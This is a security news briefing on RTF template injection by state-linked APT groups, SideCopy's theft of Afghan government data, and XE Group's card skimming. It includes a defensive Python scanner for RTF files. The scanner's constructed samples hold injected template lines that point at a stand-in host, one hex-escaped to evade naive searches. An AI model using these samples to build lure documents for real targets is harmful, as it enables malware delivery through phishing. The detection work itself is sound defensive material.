At a glance.
- RTF template injection used by nation-state actors.
- SideCopy targets South Asia.
- XE Group skims credit cards.
RTF template injection used by nation-state actors.
Researchers at Proofpoint have observed "the adoption of a novel and easily implemented phishing attachment technique by APT threat actors in Q2 and Q3 of 2021." The technique, called RTF template injection, is being used by several state-sponsored threat actors associated with China, India, and Russia:
"RTF template injection is a simple technique in which an RTF file containing decoy content can be altered to allow for the retrieval of content hosted at an external URL upon opening an RTF file. By altering an RTF file’s document formatting properties, specifically the document formatting control word for “\*\template” structure, actors can weaponize an RTF file to retrieve remote content by specifying a URL resource instead of an accessible file resource destination. RTF files include their document formatting properties as plaintext strings within the bytes of the file. This allows the property control word syntax to be referenced even in the absence of a word processor application, providing formatting stability for the filetype across numerous platforms. However, RTF files based on the malleability of these plaintext strings within the bytes of a file are often subverted for malicious file delivery purposes in the context of a phishing campaign. While historically the use of embedded malicious RTF objects has been well documented as a method for delivering malware files using RTFs, this new technique is more simplistic and, in some ways, a more effective method for remote payload delivery than previously documented techniques."
The researchers conclude that “based on the recent rise in its usage and the triviality of its implementation, [the technique] could soon be adopted by cybercriminals as well.”
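Because the template destination is stored as a plaintext control word, the technique is also straightforward to look for on the defensive side. The following Python scanner is an added illustration for this briefing, not code from Proofpoint's report: it pulls every `{\*\template ...}` destination out of an RTF file and flags the file when that destination is a URL or UNC path instead of a local file. The three sample RTF byte strings and the `placeholder.example` host are constructed for the example, and the decoding of RTF `\'hh` hex escapes is a general format-handling choice (so a scheme spelled byte-by-byte is still seen), not something the report text above describes.

```python
import re
import sys

# Constructed sample RTF files for this example (not samples from the report).
# A benign document whose template destination is a local file path.
BENIGN_RTF = rb"{\rtf1\ansi{\*\template C:\\Users\\user\\Templates\\Normal.dotm}{\fonttbl{\f0 Arial;}}\f0 Quarterly report\par}"
# A document whose template destination is a URL, the pattern the report describes.
INJECTED_RTF = rb"{\rtf1\ansi{\*\template http://placeholder.example/rtf/template.dotm}{\fonttbl{\f0 Arial;}}\f0 Quarterly report\par}"
# The same kind of URL with its scheme written as RTF \'hh hex escapes,
# so a plain substring search for "http" inside the file would miss it.
HEX_ESCAPED_RTF = rb"{\rtf1\ansi{\*\template \'68\'74\'74\'70://placeholder.example/t.rtf}\par}"

# The {\*\template ...} destination group; the capture is everything up to the closing brace.
TEMPLATE_RE = re.compile(rb"\{\\\*\\template\s*([^}]*)\}")
# RTF escape for one byte given as two hex digits, e.g. \'68 -> 'h'.
HEX_ESCAPE_RE = re.compile(rb"\\'([0-9A-Fa-f]{2})")
# Destination prefixes that make the word processor fetch something outside the file.
REMOTE_PREFIXES = ("http://", "https://", "ftp://", "file://", "\\\\")


def decode_rtf_escapes(data: bytes) -> bytes:
    """Resolve \\'hh hex escapes and the \\\\ escape for a literal backslash."""
    data = HEX_ESCAPE_RE.sub(lambda m: bytes([int(m.group(1), 16)]), data)
    return data.replace(b"\\\\", b"\\")


def find_template_destinations(rtf: bytes) -> list:
    """Return every \\*\\template destination in the file as a decoded string."""
    return [
        decode_rtf_escapes(m.group(1)).strip().decode("latin-1")
        for m in TEMPLATE_RE.finditer(rtf)
    ]


def is_remote(destination: str) -> bool:
    """True when the destination is a URL or UNC path rather than a local file."""
    return destination.lower().startswith(REMOTE_PREFIXES)


def scan_rtf(rtf: bytes) -> dict:
    """Summarise the template destinations of one RTF blob and whether any is remote."""
    if not rtf.lstrip().startswith(b"{\\rtf"):
        return {"is_rtf": False, "templates": [], "remote_templates": [], "suspicious": False}
    templates = find_template_destinations(rtf)
    remote = [t for t in templates if is_remote(t)]
    return {
        "is_rtf": True,
        "templates": templates,
        "remote_templates": remote,
        "suspicious": bool(remote),
    }


def scan_file(path: str) -> dict:
    """Scan an RTF file on disk."""
    with open(path, "rb") as fh:
        return scan_rtf(fh.read())


if __name__ == "__main__":
    # With no arguments, scan the constructed samples; otherwise scan the given paths.
    if len(sys.argv) > 1:
        for path in sys.argv[1:]:
            print(path, scan_file(path))
    else:
        samples = (("benign", BENIGN_RTF), ("injected", INJECTED_RTF), ("hex-escaped", HEX_ESCAPED_RTF))
        for name, blob in samples:
            print(f"{name}: {scan_rtf(blob)}")
```

Run it with no arguments to see the verdict on the three constructed samples, or pass file paths to scan a mail-gateway quarantine. A remote template destination in an attachment is the signal to act on; the benign sample shows that the control word itself is normal and should not be alerted on without looking at where it points.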
SideCopy targets South Asia.
Malwarebytes has provided more details on a cyberespionage campaign run by SideCopy, a Pakistan-aligned threat actor that’s targeting countries in South Asia, particularly Afghanistan and India:
"The SideCopy APT was able to steal several Office documents and databases associated with the Government of Afghanistan. As an example, the threat actor exfiltrated Diplomatic Visa and Diplomatic ID cards from the Ministry of Foreign Affairs of Afghanistan database, as well as the Asset Registration and Verification Authority database belonging to the General Director of Administrative Affairs of Government of Afghanistan. They also were able to exfiltrate the ID cards of several Afghani government officials.... The exfiltrated documents contain names, numbers and email addresses associated with government officials. It is possible that they have been already targeted by the actor or will be the future targets of this actor. There are also some confidential letters that we think the actor is planning to use for future lures."
XE Group skims credit cards.
Volexity has published a report on a criminal threat actor dubbed "XE Group," suspected to be operating from Vietnam. XE Group is focused on credit card skimming by compromising legitimate websites:
“There is a relatively clear trail of evidence to help identify XE Group. The attacker appears to be of Vietnamese origin. They often use the brand ‘XE Group,’ and a number of ‘xe[word]’ themed domains have been registered and linked to the group. Volexity has identified a likely persona on carding forums associated with this activity, which suggests the attacker monetizes stolen credit card data through sales rather than direct use of stolen cards themselves. The persona used for the GitHub and carding account, and several of the domains, have a history going back to 2013, which suggests the attacker may have been attempting similar attacks for up to eight years, with only one significant public mention of their activity. The oldest malware sample Volexity was able to identify relating to XE Group dates back to late 2014.”